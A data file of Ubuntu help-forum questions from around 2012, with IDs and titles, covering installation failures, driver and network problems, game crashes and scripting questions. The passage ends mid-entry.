175791	how do i manage google chrome updates with the update manager ?	new ubuntu user question . i have installed google chrome with software center and used terminal to get it to show up . today update mgr ran and it said an update for chrome was ready so i accepted it and it downloaded . my question is do i have to do something else , like with terminal , to get it to update , or does the update mgr take care of everything ? thank you
175793	what does the following dmesg output means ?	i am not sure what does this following means : - [ 0.652039 ] acpi : added _osi ( module device ) [ 0.652044 ] acpi : added _osi ( processor device ) [ 0.652049 ] acpi : added _osi ( 3.0 _scp extensions ) [ 0.652054 ] acpi : added _osi ( processor aggregator device ) [ 0.656286 ] acpi : ec : look up ec in dsdt [ 0.660361 ] acpi : executed 1 blocks of module-level executable aml code ** [ 0.720310 ] [ firmware bug ] : acpi : bios _osi ( linux ) query ignored** [ 0.721539 ] acpi : ssdt 000000009ce70798 00727 ( v01 pmref cpu0cst 00003001 intl 20100121 ) [ 0.722623 ] acpi : dynamic oem table load : [ 0.722630 ] acpi : ssdt ( null ) 00727 ( v01 pmref cpu0cst 00003001 intl 20100121 ) [ 0.752832 ] acpi : ssdt 000000009ce71a98 00303 ( v01 pmref apist 00003000 intl 20100121 ) what kind of bug is this ? does this bug affects my system performance .
175795	ubuntu 11.10 shutting down randomly and unexpectadely	i have a bit of a strange problem that just started happening recently . out of nowhere ubuntu 11.10 will just shut down . i do n't think its hardware because i ca n't find any information in the logs . i do n't think its temperature because i monitor my temps and my machine is liquid cooled . the pc continues to run while the os shuts down so its not being interrupted by power where all of a sudden everything just loses power . i do n't really overload the machine at all , i mostly just code on it , but i do have apache2 , tomcat , james email server , and mysql running on the system and they are auto started . i do n't actually have any traffic coming into the machine though , i use it specifically for development . edit from comments : it 's not really going to a shut down screen , the screens go black and the computer still runs , but the actual os shuts down because if i'm listening to music or something , the music will skip a few times and then stop . this is how ubuntu normally shuts down for me so i assume its a software shutdown . it 's not following a pattern unfortunately , it 's random and sometimes within a few hours of the last time , other times its days between . normally when i am on the machine . any ideas on how i can diagnose a problem like this ? does this sound like a memory leak issue ?
175797	failed encryption	i just installed xubuntu 12.04 , and things seemed to be going fine . i clicked on the updates message and started the updates . a message popped up asking me to encrypt my passphrase , so i told it to proceed . i started typing in my passphrase and noticed that nothing was appearing in the entry box . i tried clicking on it and typing again , but nothing appeared . i figure , well i 'll do this later and closed the box . after my updates completed i re-started xubuntu and now it tells me that my password is incorrect . i tried different fragments of the password in case some of the typing went through but did n't appear in the encryption box , but this too was futile .
175798	how can i have audio in google dictionary 's pop-up bubble ?	can someone show me how to have audio in google dictionary ? i can double-click on a word and a small bubble would pop up with the definition . but i do not have the pronunciation sound . but if i click `` more > > '' to have google dictionary open on a new tab , then i can have the audio just fine . am i missing some java plugins or something ? i have lubuntu 12.04 . thank you !
175799	changing ownership and permissions of /usr/bin/ and /var disables ssh	i recently made changes to /usr/sbin and /var : chown root : root and then did chmod 775 for each . i basically wanted to only have the root user , and those users that belong to certain groups access those folders ( all other users ca n't access ) . when i made these changes , now i ca n't use ssh to get to the server remotely . any ideas on how/what files and directories are affecting this ?
175805	which software is suitable for remote-desktop management ?	which software is suitable in ubuntu for remote desktop management using internet . not home network ( lan ) .
175814	how to install proprietary nvidia driver in 12.04 ?	i am trying to install ubuntu on an amd processor and nvidia graphics card machine . how do i load the proprietary driver to be able to install the open source driver for nvidia gtx 560 or how do i install it at all ? i have read somewhere that the 12.04 lts open source driver for nvidia gtx 560 crashes , will it work or are there any special problems to look out for . once i select `` try ubuntu without installing '' or `` install ubuntu '' i get the logo of a loading screen , then my video card crashes , and my 2 lcd displays blink and turn off . everything else seems to be functioning right though . there is activity on the usb drive , and on the hard drives like it was detecting them .
175817	installing pygame for python3.2	i am installing pygame for python3.2 because i want to do all the examples shown in a book , but on ubuntu 12.04 i only have pygame for python version 2.7 . but that is not as good as i want it . so i started to do it like here but , when starting this command : python3.2 config.py there were this output : portmidi : not found porttime : not found avformat : not found swscale : not found what should i do , so i can install pygame without any problems ?
175820	mysql does n't update due to error in apparmor profile	i got a mysql error after the update of it . this is the log . ( leyendo la base de datos ... 559752 ficheros o directorios instalados actualmente . ) desinstalando mysql-server ... configurando mysql-server-5.5 ( 5.5.24-0ubuntu0.12.04.1 ) ... error del analizador apparmor para /etc/apparmor.d/usr.sbin.mysqld in /etc/apparmor.d/usr.sbin.mysqld en la l ? nea 40 : syntax error , unexpected tok_end_of_rule , expecting tok_mode start : job failed to start invoke-rc.d : initscript mysql , action `` start '' failed . dpkg : error al procesar mysql-server-5.5 ( -- configure ) : el subproceso instalado el script post-installation devolvió el código de salida de error 1 no se escribió ningún informe «apport» porque ya se ha alcanzado el valor de «maxreports» se encontraron errores al procesar : mysql-server-5.5 e : sub-process /usr/bin/dpkg returned an error code ( 1 ) un paquete no se pudo instalar . tratando de recuperarlo : configurando mysql-server-5.5 ( 5.5.24-0ubuntu0.12.04.1 ) ... error del analizador apparmor para /etc/apparmor.d/usr.sbin.mysqld in /etc/apparmor.d/usr.sbin.mysqld en la l ? nea 40 : syntax error , unexpected tok_end_of_rule , expecting tok_mode start : job failed to start invoke-rc.d : initscript mysql , action `` start '' failed . dpkg : error al procesar mysql-server-5.5 ( -- configure ) : el subproceso instalado el script post-installation devolvió el código de salida de error 1 se encontraron errores al procesar : mysql-server-5.5 if some one can help . i have try to remove mysql server and it tells me this . se encontraron errores al procesar : mysql-server-5.5 mysql-server e : sub-process /usr/bin/dpkg returned an error code ( 1 added english translation to log file : ( reading database ... 559752 files and directories currently installed . ) removing mysql-server ... setting up mysql-server-5.5 ( 5.5.24-0ubuntu0.12.04.1 ) ... apparmor parser error for /etc/apparmor.d/usr.sbin.mysqld in /etc/apparmor.d/usr.sbin.mysqld in the l ? line 40 : syntax error , unexpected tok_end_of_rule , expecting tok_mode start : job failed to start invoke-rc.d : initscript mysql , action `` start '' failed . dpkg : error processing mysql-server-5.5 ( -- configure ) : subprocess installed post-installation script returned error exit code 1 do not write any report `` dumbbell '' because it has already reached the value of `` maxreports» errors were encountered while processing : mysql-server-5.5 e : sub-process /usr/bin/dpkg returned an error code ( 1 ) a package failed to install . trying to recover : setting up mysql-server-5.5 ( 5.5.24-0ubuntu0.12.04.1 ) ... apparmor parser error for /etc/apparmor.d/usr.sbin.mysqld in /etc/apparmor.d/usr.sbin.mysqld in the l ? line 40 : syntax error , unexpected tok_end_of_rule , expecting tok_mode start : job failed to start invoke-rc.d : initscript mysql , action `` start '' failed . dpkg : error processing mysql-server-5.5 ( -- configure ) : subprocess installed post-installation script returned error exit code 1 errors were encountered while processing : mysql-server-5.5
175825	/bin/sh : 1 : arm-linux-gnueabi-gcc : not found	i 'm working on eclipse indigo on ubuntu 12.04 . and i 'm trying to cross compile so i downloaded gcc-4.4-arm-linux-gnueabiarm-linux-gnueabi-4.4 and i changed the c/c++ build setting and i added includes and library to my path . but it tells me that it does n't find the arm-linux-gnueabi-gcc . can somebody help me out ? i would greatly appreciate it .
175830	internet not working with an ar8162	i recently installed ubuntu 12.04 on my laptop , but for some reason the internet does not work . the lan works on windows 7 though . my network card is atheros ar8162 , also the option `` wired '' does not appear in the network window . it also says `` no proprietary drivers are installed on your system '' i really need to get my lan working so i can get the nvidia driver
175836	creating a script to install software after a clean install ?	i find myself moving between multiple new machines lately ( new laptop , new computer at work , etc. ) . i want to create a bash script to install all the software i use . ninite is not reach enough . i have no experience in bash scripts , i 'm learning it . i 'm planing to use aptitude search to find the packages names ( if the exists in the repositories ) and to create multiple line of aptitude install . than all i will have to do after installing ubuntu from scratch is to install altitude and run the script . will the script line will run one after another ( and not in parallel and fail ) ? can i do a `` silent install '' so the installation program wo n't prompt for answers ( pre-define the answers or user default ) ? is there a way to define some system settings by bash script ?
175837	problems with psychonauts and the ubuntu software center ?	i decided to buy the psychonauts pc game from the ubuntu software center . now , my laptop is practically empty , with only my os and a few bits and bobs installed . the download for psychonauts took about 6 hours , and i waited patiently for it to download the 4.4 gb . now , however , it comes up with something to the effect of `` the packages can not be downloaded . check for internet connection problems . '' i do n't know if it had downloaded the files to anywhere that i could access , or is there no way but to spend another 6 hours and hope for the best ? i 've never had this problem whilst downloading or installing anything else , and it will only redirect me towards redownloading the whole thing when i try ! any help would be much appreciated . note : after trying to install the previous packages with synaptic and failing to run psychonauts , i found that sudo apt-get install psychonauts would work , but was getting e : could not get lock /var/lib/dpkg/lock - open ( 11 resource temporarily unavailable ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) . rebooting and running terminal directly after start-up seemed to fix this and i am currently downloading psychonauts through it at the same speed as that of usc . possible work-around for my first time using commands ?
175843	how to display a `` what 's new '' dialog on every new version of my app	i 'd like to be able to present a dialog that runs at the start of my application and shows the new features this new version implements . this dialog should only run once , and not be showed again until the user upgrades to a higher version of the app . i 'm not looking for a snippet , but rather for a suggestion on how to do this . what 's the best way to display such a dialog , so that it appears only once on the first run after the app has been upgraded ?
175846	how to run a program installed on the windows partition with wine ?	i dual boot windows and ubuntu ( but rarely ever use windows , just in case there is something i need windows for ) and i already have the sims 3 installed on my windows partition . i was just wondering ( since i know you can access that partition from ubuntu ) , if i could use wine to run the sims 3 from that partition , so that i do n't have to install it a second time and could save space , because there really is no sense in installing it twice , if it is possible could someone tell me how to do this ? i also noticed in the description of wine that you could run it ( if you dual boot ) using the actual windows files , could someone also tell me how to do that and if it would be a good idea ?
175847	bash script to create multiple directories and subdirectories	i 'm currently using the following two scripts to create multiple directories and subdirectories . the first script creates '/dir1/dir2 ' and the second script then adds multiple subdirectories to 'dir2 ' . # ! /bin/bash # creates directories and subdirectories from text file cat *.txt | xargs -l 1 mkdir -p # ! /bin/bash # lists all directories in current working directory and create subdirectories list=`ls -d` for i in $ list ; do mkdir -p $ i '' /dir3/dir4/ '' done i 've combined the two script but the subdirectories dir3 and dir4 are created in dir1 and not dir2 as intended . with my very limited knowledge of scripting i 'm unable to successfully search for the answer and therefore turn to you guys for assistance .
175849	dell inspiron 1525 battery not working ( ubuntu 10.04 )	i am using ubuntu 10.04 on dell n5010 with perfect battery but it get immediately hibernate after removing power cord . battery is charing during ubuntu use .
175858	problems with everything after update ubuntu 12.04	after update to version 12.04 the update manager crashes all time . in addition firefox have lost most plugins , and its impossible install these it seems ( no error , but plugins are still missing after installing ) . even libeoffice is changed . all icons are gone so its a text version now ( `` summarize '' in stead of icon for this `` sigma-sy , bol '' ) . can i reset to older versions ? other suggestions ? in worst case i have to remove linux and go back to windows . : (
175868	what can be done to make wine look more integrated into unity ?	wine looks like an alien that says `` hello , i am definitely not part of your desktop environment '' . many wine applications have no icons and wine itself runs on the ugly-looking windows 95 theme . is there a way to make wine more aesthetic and less alien ? how can i add icons to wine programs such as ms office for instance ? i tried the ambience xp theme but it does n't look so great and still feels unrelated to unity 's gtk3 ambience theme . joey-elijah , the editor of omg ! ubuntu ! made a post about a script that integrates wine into the desktop but i ran the script and it had no effect . i assumed that the script does n't run on precise . am i wrong ? is there a way to make wine look ... prettier ?
175870	apache or php inserting a newline at start of every html and xhr response	i have a php app running on a cloud-based ubuntu server and for some reason , i am getting a newline at the start of every html file or xhr response . i have a local version of the app running on ubuntu , and this newline does not appear . specifically , the bad responses have one additional character with ascii code 10 prepended to each response . this is causing my javascript to break because the xhr object wo n't recognize the xhr responses as xml because of the leading newline character . i am using the agavi framework , version 0.9.2 ( yes , old ! ) as the php web framework . i have been able to insert echo statements into my custom views and the newline still appears first in the response . so is it apache or agavi or something else doing this ? any thoughts ? thanks .
175873	how to uninstall other os 's using ubuntu ?	having found mint better than windows 7 , and now finding ubuntu 12.04 an even better experience , i would like to uninstall mint from my triple-booted machine . ( migrating my files to ubuntu , of course . ) how to do this ? follow-up : is there a simple procedure for uninstalling windows 7 , while migrating files to ubuntu 12.04 ?
175874	12.04 gnome . icons dont drag properly	i have a 4 monitor setup with xinerama in seperate x windows . i installed gdm and got rid of the big mouse icon . somewhere along the way though , icons got screwy . whenever i try and move them , i have to drag my mouse down for a while . then the icon appears near the top of the monitor . side to side doesnt seem to do it . i 'd just like to do a full reinstall of the desktop and start from scratch , not sure how to do that . apt-get remove ubuntu-desktop , then install only did a small amount of data . open to other suggestions as well
175878	automatically mounting internal hdd on 12.04	i am wondering if all i need to do is add the disks to the fstab ( ubuntu 12.04lts desktop ) they are both 1 tb internal hard drives this site has my text going bold like crazy \ formatting using sudo gedit /etc/fstab to get into the file to modify what drives mount on the boot original fstab proc /proc proc nodev , noexec , nosuid 0 0 uuid=77d01510-9a51-4818-850c-da05654442f7 / ext4 errors=remount-ro 0 1 uuid=43ebb068-1983-45a4-b2b7-303caec17d16 none swap sw 0 0 the changed being proc /proc proc nodev , noexec , nosuid 0 0 uuid=77d01510-9a51-4818-850c-da05654442f7 / ext4 errors=remount-ro 0 1 uuid=43ebb068-1983-45a4-b2b7-303caec17d16 none swap sw 0 0 uuid=77d01510-9a51-4818-850c-da05654442f7 /media/1.0ubuntu ext4 defaults 0 1 uuid=7cb810dbb810962c /media/new volume ntfs default 0 1 uuid from blkid and mount pt from disk utility in case anyone is using this . dump is for archiving so i left at 0 and pass is a disk check ( found on wikipedia ) so i put 2 so it checks after the root . defaults was just to fill the options .
175883	uefi boot on my asus k52f	i was reviewing my settings in bios and uefi was disabled . i wanted to check what uefi was so i googled it . i found out its like an upgrade to bios and improved boot speed . currently i 'm dual booting ubuntu 12.04 ( 32 bit ) and windows 7 ( 64 bit ) . i 'm currently confused as to how to make the switch since i do n't want to make my system unbootable . how do i make the switch from bios to uefi . system chipset : intel hm55 processor : intel pentium p6100 2 ghz
175884	ubuntu software center starts , then crashes before fully loaded	i am brand new to linux and ubuntu , and i could n't install gimp without the software center . i looked up earlier how to fix it , and it said to fix my sources list , and i did , but now i get a new error in the terminal . 2012-08-14 15:29:08,941 - softwarecenter.ui.gtk3.app - info - setting up proxy 'none' 2012-08-14 15:29:08,954 - softwarecenter.db.database - info - open ( ) database : path=none use_axi=true use_agent=true 2012-08-14 15:29:09,407 - softwarecenter.ui.gtk3.app - info - building local database 2012-08-14 15:29:09,408 - softwarecenter.db.pkginfo_impl.aptcache - info - aptcache.open ( ) 2012-08-14 15:29:17,308 - softwarecenter.db.update - warning - problem creating rebuild path '/var/cache/software-center/xapian_rb ' . 2012-08-14 15:29:17,309 - softwarecenter.db.update - warning - please check you have the relevant permissions . 2012-08-14 15:29:17,309 - softwarecenter.db.database - info - open ( ) database : path=none use_axi=true use_agent=true 2012-08-14 15:29:18,039 - softwarecenter.backend.reviews - warning - could not get usefulness from server , no username in config file 2012-08-14 15:29:18,431 - softwarecenter.ui.gtk3.app - info - show_available_packages : search_text is '' , app is none . 2012-08-14 15:29:19,153 - softwarecenter.db.pkginfo_impl.aptcache - info - aptcache.open ( ) traceback ( most recent call last ) : file `` /usr/bin/software-center '' , line 176 , in < module > app.run ( args ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/app.py '' , line 1422 , in run self.show_available_packages ( args ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/app.py '' , line 1352 , in show_available_packages self.view_manager.set_active_view ( viewpages.available ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/session/viewmanager.py '' , line 154 , in set_active_view view_widget.init_view ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/panes/availablepane.py '' , line 136 , in init_view softwarepane.init_view ( self ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/panes/softwarepane.py '' , line 215 , in init_view self.icons , self.show_ratings ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/appview.py '' , line 69 , in __init__ self.helper = apppropertieshelper ( db , cache , icons ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/models/appstore2.py '' , line 109 , in __init__ softwarecenter.paths.app_install_path ) file `` /usr/share/software-center/softwarecenter/db/categories.py '' , line 255 , in parse_applications_menu category = self._parse_menu_tag ( child ) file `` /usr/share/software-center/softwarecenter/db/categories.py '' , line 444 , in _parse_menu_tag query = self._parse_include_tag ( element ) file `` /usr/share/software-center/softwarecenter/db/categories.py '' , line 402 , in _parse_include_tag xapian.query.op_and ) file `` /usr/share/software-center/softwarecenter/db/categories.py '' , line 341 , in _parse_and_or_not_tag operator_elem , xapian.query ( ) , xapian.query.op_or ) file `` /usr/share/software-center/softwarecenter/db/categories.py '' , line 385 , in _parse_and_or_not_tag q = self.db.xapian_parser.parse_query ( s , file `` /usr/share/software-center/softwarecenter/db/database.py '' , line 174 , in xapian_parser xapian_parser = self._get_new_xapian_parser ( ) file `` /usr/share/software-center/softwarecenter/db/database.py '' , line 200 , in _get_new_xapian_parser xapian_parser.set_database ( self.xapiandb ) file `` /usr/share/software-center/softwarecenter/db/database.py '' , line 166 , in xapiandb self._db_per_thread [ thread_name ] = self._get_new_xapiandb ( ) file `` /usr/share/software-center/softwarecenter/db/database.py '' , line 179 , in _get_new_xapiandb xapiandb = xapian.database ( self._db_pathname ) file `` /usr/lib/python2.7/dist-packages/xapian/__init__.py '' , line 3666 , in __init__ _xapian.database_swiginit ( self , _xapian.new_database ( *args ) ) xapian.databaseopeningerror : could n't detect type of database i 'm not sure how to fix the errors , and i could n't find a topic on them anywhere . be nice , because i am a two-day old linux user : / tell me if you need my sources list
175886	failed in install cinnamon - held broken packages	i am trying to install cinnamon and allow myself to choose which one i would prefer . i have done the first two main steps . sudo add-apt-repository ppa : merlwiz79/cinnamon-ppa and sudo apt-get update which were both successful and then i try to run . sudo apt-get install cinnamon and this is what i get - reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : cinnamon : depends : gir1.2-muffin-3.0 but it is not going to be installed depends : libcogl5 ( > = 1.7.4 ) but it is not installable depends : libmuffin0 ( > = 1.0.0-0ubuntu1~precise ) but it is not going to be installed recommends : gnome-themes-standard but it is not going to be installed recommends : gnome-session-fallback but it is not going to be installed e : unable to correct problems , you have held broken packages . any help would be appreciated !
175890	how will my laptop performe in 12.04 lts	hi i just bought this laptop . and i am considering t install ubuntu 12.04lts on it the specs is : chipset amd a50m chipset memory ddr3 1333/1066 mhz sdram , 2 x so-dimm socket for expansion up to 8 gb sdram *1 display 15.6 '' 16:9 hd ( 1366x768 ) led backlight graphic amd radeon速 hd 7470m 1gb ddr3 vram processor amd e-450
175892	minecraft error report	today i tried the first time to start minecraft ( with openjdk 6 runtime ) in ubuntu 12.04 , but when the mojang-screen should come this error-report appears : -- - begin error report b5666078 -- -- -- -- generated 14.08.12 22:58 - minecraft version : 1.3.1 - operating system : linux ( amd64 ) version 3.2.0-23-generic - java version : 1.6.0_24 , sun microsystems inc. - java vm version : openjdk 64-bit server vm ( mixed mode ) , sun microsystems inc. - memory : 50558552 bytes ( 48 mb ) / 77856768 bytes ( 74 mb ) up to 915341312 bytes ( 872 mb ) - jvm flags : 0 total ; - lwjgl : 2.4.2 - opengl : ~error~ nullpointerexception : null - is modded : probably not - type : client - texture pack : ~error~ nullpointerexception : null - profiler position : n/a ( disabled ) [ failed to get system properties ( java.lang.nullpointerexception ) ] org.lwjgl.lwjglexception : could not init glx at org.lwjgl.opengl.linuxdisplaypeerinfo.initdefaultpeerinfo ( native method ) at org.lwjgl.opengl.linuxdisplaypeerinfo. < init > ( linuxdisplaypeerinfo.java:52 ) at org.lwjgl.opengl.linuxdisplay.createpeerinfo ( linuxdisplay.java:684 ) at org.lwjgl.opengl.display.create ( display.java:854 ) at org.lwjgl.opengl.display.create ( display.java:784 ) at org.lwjgl.opengl.display.create ( display.java:765 ) at net.minecraft.client.minecraft.a ( sourcefile:233 ) at net.minecraft.client.minecraft.run ( sourcefile:516 ) at java.lang.thread.run ( thread.java:679 ) -- - end error report 82b5e9f9 -- -- -- -- -- please help ! im getting desperate .
175894	is there a mind mapping software that can handle latex ?	i run lubuntu 12.04 and after several terrible experiences with libre office i downloaded core and have not touched it since april . i find kile ok and have been learning to use that and writing with latex . i am hoping there 's a mind mapping program that i could use that is not too `` bubbly '' but most importantly can handle maths ( i.e . latex ) . i do n't need it to be able to integrate with kile but anything extra is a bonus ! tips ? edit : the latex is needed for writing mathematical equations . edit : i thought they were all useful suggestions but on balance , the selected answer was my personal favourite out of them . though it was tough to decide . dia particularly does look like a good shout with ekee .
175901	why does n't doom 3 work in ubuntu 12.04 ?	i 've ran doom 3 in several previous versions of ubuntu , but i recently did a fresh install of ubuntu 12.04 64bit , and get an error when trying to launch the game . i have the latest proprietary ati drivers installed , as well as the required 'ia32-libs ' package for 32bit support . i get the following error : doom 1.3.1.1304 linux-x86 jan 16 2007 21:58:02 found interface lo - loopback found interface eth0 - 192.168.1.2/255.255.255.0 -- -- -- initializing file system -- -- -- loaded pk4 /usr/local/games/doom3/base/game00.pk4 with checksum 0xf07eb555 loaded pk4 /usr/local/games/doom3/base/game01.pk4 with checksum 0x51c6981f loaded pk4 /usr/local/games/doom3/base/game02.pk4 with checksum 0xf3ec6f7 loaded pk4 /usr/local/games/doom3/base/game03.pk4 with checksum 0x5d4230ea loaded pk4 /usr/local/games/doom3/base/pak000.pk4 with checksum 0x28d208f1 loaded pk4 /usr/local/games/doom3/base/pak001.pk4 with checksum 0x40244be0 loaded pk4 /usr/local/games/doom3/base/pak002.pk4 with checksum 0xc51ecdcd loaded pk4 /usr/local/games/doom3/base/pak003.pk4 with checksum 0xcd79d028 loaded pk4 /usr/local/games/doom3/base/pak004.pk4 with checksum 0x765e4f8b loaded pk4 /usr/local/games/doom3/base/pak005.pk4 with checksum 0x8ffc3621 loaded pk4 /usr/local/games/doom3/base/pak006.pk4 with checksum 0x95b65ab loaded pk4 /usr/local/games/doom3/base/pak007.pk4 with checksum 0x666bdb3c loaded pk4 /usr/local/games/doom3/base/pak008.pk4 with checksum 0x23ae5993 current search path : /home/klusacek/.doom3/base /usr/local/games/doom3/base /usr/local/games/doom3/base/pak008.pk4 ( 3 files ) /usr/local/games/doom3/base/pak007.pk4 ( 38 files ) /usr/local/games/doom3/base/pak006.pk4 ( 48 files ) /usr/local/games/doom3/base/pak005.pk4 ( 63 files ) /usr/local/games/doom3/base/pak004.pk4 ( 5137 files ) /usr/local/games/doom3/base/pak003.pk4 ( 4676 files ) /usr/local/games/doom3/base/pak002.pk4 ( 6120 files ) /usr/local/games/doom3/base/pak001.pk4 ( 8972 files ) /usr/local/games/doom3/base/pak000.pk4 ( 2698 files ) /usr/local/games/doom3/base/game03.pk4 ( 2 files ) /usr/local/games/doom3/base/game02.pk4 ( 2 files ) /usr/local/games/doom3/base/game01.pk4 ( 2 files ) /usr/local/games/doom3/base/game00.pk4 ( 2 files ) game dll : 0x0 in pak : 0x0 addon pk4s : file system initialized . -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - initializing decls -- -- - -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - initializing rendersystem -- -- -- -- using arb rendersystem rendersystem initialized . -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 5206 strings read from strings/english.lang could n't open journal files execing editor.cfg execing default.cfg could n't exec doomconfig.cfg could n't exec autoexec.cfg 5206 strings read from strings/english.lang -- -- - initializing sound system -- -- -- sound system initialized . -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - r_initopengl -- -- - setup x display connection dlopen ( libgl.so.1 ) dlopen ( libgl.so.1 ) idrendersystem : :shutdown ( ) signal caught : segmentation fault si_code 1 was in fatal error shutdown : unable to initialize opengl trying to exit gracefully.. and the output of : glxinfo | grep direct : direct rendering : yes gl_amd_multi_draw_indirect , gl_amd_name_gen_delete , gl_arb_draw_indirect , gl_arb_draw_instanced , gl_ext_copy_buffer , gl_ext_copy_texture , gl_ext_direct_state_access , any help would be appreciated . thanks
175902	remote x-server with ssh -x	i am trying to start a remote gnome session using : ssh -x username @ 192.168.1.107 gnome-session both client and server are ubuntu version 12.04 i get the following ( and not a lot happens ) ... gnome_keyring_control=/tmp/keyring-3aenah gpg_agent_info=/tmp/keyring-3aenah/gpg:0:1 gnome_keyring_pid=3573 gnome_keyring_control=/tmp/keyring-3aenah gpg_agent_info=/tmp/keyring-3aenah/gpg:0:1 gnome_keyring_control=/tmp/keyring-3aenah gpg_agent_info=/tmp/keyring-3aenah/gpg:0:1 ssh_auth_sock=/tmp/keyring-3aenah/ssh gnome_keyring_control=/tmp/keyring-3aenah gpg_agent_info=/tmp/keyring-3aenah/gpg:0:1 ssh_auth_sock=/tmp/keyring-3aenah/ssh ( gnome-settings-daemon:3572 ) : color-plugin-warning ** : failed to get contents of /sys/class/dmi/id/board_version : failed to open file '/sys/class/dmi/id/board_version ' : no such file or directory ** ( gnome-settings-daemon:3572 ) : warning ** : you can only run one xsettings manager at a time ; exiting ** ( gnome-settings-daemon:3572 ) : warning ** : unable to start xsettings manager : could not initialize xsettings manager . compiz ( core ) - error : screen 0 on display `` localhost:10.0 '' already has a window manager ; try using the -- replace option to replace the current window manager . initializing nautilus-gdu extension created new window in existing browser session . ** message : applet now removed from the notification area ** message : using fallback from indicator to gtkstatusicon ( gnome-settings-daemon:3572 ) : keyboard-plugin-warning ** : failed to set the keyboard layouts : gdbus.error : org.freedesktop.accounts.error.permissiondenied : not authorized ** ( gnome-settings-daemon:3572 ) : warning ** : failed to connect context : connection refused ( gnome-settings-daemon:3572 ) : clipboard-plugin-warning ** : clipboard manager is already running . ( gnome-settings-daemon:3572 ) : color-plugin-warning ** : failed to create device : gdbus.error : org.freedesktop.colormanager.failed : failed to obtain org.freedesktop.color-manager.create-device auth ( gnome-settings-daemon:3572 ) : color-plugin-warning ** : gdbus.error : org.freedesktop.colormanager.failed : failed to obtain org.freedesktop.color-manager.create-profile auth ( gnome-settings-daemon:3572 ) : color-plugin-warning ** : no xrandr-samsung electric company-samsung device found : failed to find output xrandr-samsung electric company-samsung shutting down nautilus-gdu extension ** ( gnome-settings-daemon:3572 ) : warning ** : failed to connect context : connection refused connection failure : connection refused pa_context_connect ( ) failed : connection refused
175908	ca n't instal 12.04 , stops at purple screen	i tried to install 12.04 with a cd . i downloaded everything , burned the cd and changed the boot order from my pc . i then restart my pc with the cd in it but all i get is a purple screen with a keyboard and a menu at the bottom of the screen and it blocks there . i read that you are supposed to push a random keyboard button but when i do it , nothing happens except for one time where i got to another screen with a bunch of language but then it stops there . hope you guys can help me .
175910	phpmyadmin does n't work with other user than www-data ?	i 've changed the user+group where apache is running to my user name so i do n't have to change the web files i 'm editing . but now i get nodatareceived error trying to import using phpmyadmin . http : //wiki.phpmyadmin.net/pma/faq_1.16 what can i do to avoid this problem ? when i change back in /etc/apache2/envvar to www-data for user and group it works to import the same file to the same db . i login to phpmyadmin as root .
175911	how to combine quickly and my python program ?	firstly , i 'm not sure if i 'm allowed to ask this question . i 'll delete it if it 's not welcome . i 'm after some guidance on how to start programming . perhaps i need to start somewhere else , but i 'm interested in learning to code , however i 've not taken a single course in computer science in my life . i 've read tutorials but i prefer to start writing programs and ask how to do things when i get stuck . i 've written a program in python today and it works very well , and i 've written a few things in python now , but only simple programs like the one i wrote today http : //paste.ubuntu.com/1147685/ which i managed to do without help , ( only following some things on the python website ) but what i really want is to write a gui program . i 've heard `` quickly '' is a good program and i 've installed that and i can now use glade to make simple windows with buttons and text boxes , but that 's about as far as i 've got . it seems to me that all the tutorials i 've read on quickly and , is it gtk ? or gtk+ ? or pygtk ? i 'm not sure , but one of them anyway makes the kind of things i 'm after . a program which runs on python and has clickable buttons and does n't need an open terminal . right so the question : could someone please tell me which tutorial i need to read to allow me to make a program written in python using quickly ( the bit where you type quickly edit - i have no idea what to put in those files ! ) thank you for taking the time to read my question .
175912	is gnome classic ( no effects ) faster than unity 2d ?	is gnome classic ( no effects ) faster than unity 2d ?
175916	flash player cursor is too big	i have upgraded to ubuntu 12.04 from 10.04 and i 've encountered a weird problem . cursor size is normal except when i hover over a youtube video or any flash content . its size becomes two times normal . how can i solve this ?
175917	can not connect to internet with ubuntu 11.10 wired connection	i installed ubuntu 11.10 on my dell optiplex 745 today . i could not connect to the internet with the livecd , but i installed it anyway . it still does n't work . this is the first time linux has been installed on this computer . windows xp connects with no problem . i have a broadcom netxtreme 57xx gigabit controller . i have tried removing networkmanager and using dhclient but it does n't work either . i also tried : modprobe tg3 and then : dhclient eth0 the last command runs forever . i dont know if thats good or bad . when i do : ping google.com or try to open a page with firefox , i get a connection error . edit : lspci output : flyingfisch @ office-optiplex-745 : ~ $ lspci 00:00.0 host bridge : intel corporation 82q963/q965 memory controller hub ( rev 02 ) 00:01.0 pci bridge : intel corporation 82q963/q965 pci express root port ( rev 02 ) 00:02.0 vga compatible controller : intel corporation 82q963/q965 integrated graphics controller ( rev 02 ) 00:02.1 display controller : intel corporation 82q963/q965 integrated graphics controller ( rev 02 ) 00:1a.0 usb controller : intel corporation 82801h ( ich8 family ) usb uhci controller # 4 ( rev 02 ) 00:1a.1 usb controller : intel corporation 82801h ( ich8 family ) usb uhci controller # 5 ( rev 02 ) 00:1a.7 usb controller : intel corporation 82801h ( ich8 family ) usb2 ehci controller # 2 ( rev 02 ) 00:1b.0 audio device : intel corporation 82801h ( ich8 family ) hd audio controller ( rev 02 ) 00:1c.0 pci bridge : intel corporation 82801h ( ich8 family ) pci express port 1 ( rev 02 ) 00:1c.4 pci bridge : intel corporation 82801h ( ich8 family ) pci express port 5 ( rev 02 ) 00:1d.0 usb controller : intel corporation 82801h ( ich8 family ) usb uhci controller # 1 ( rev 02 ) 00:1d.1 usb controller : intel corporation 82801h ( ich8 family ) usb uhci controller # 2 ( rev 02 ) 00:1d.2 usb controller : intel corporation 82801h ( ich8 family ) usb uhci controller # 3 ( rev 02 ) 00:1d.7 usb controller : intel corporation 82801h ( ich8 family ) usb2 ehci controller # 1 ( rev 02 ) 00:1e.0 pci bridge : intel corporation 82801 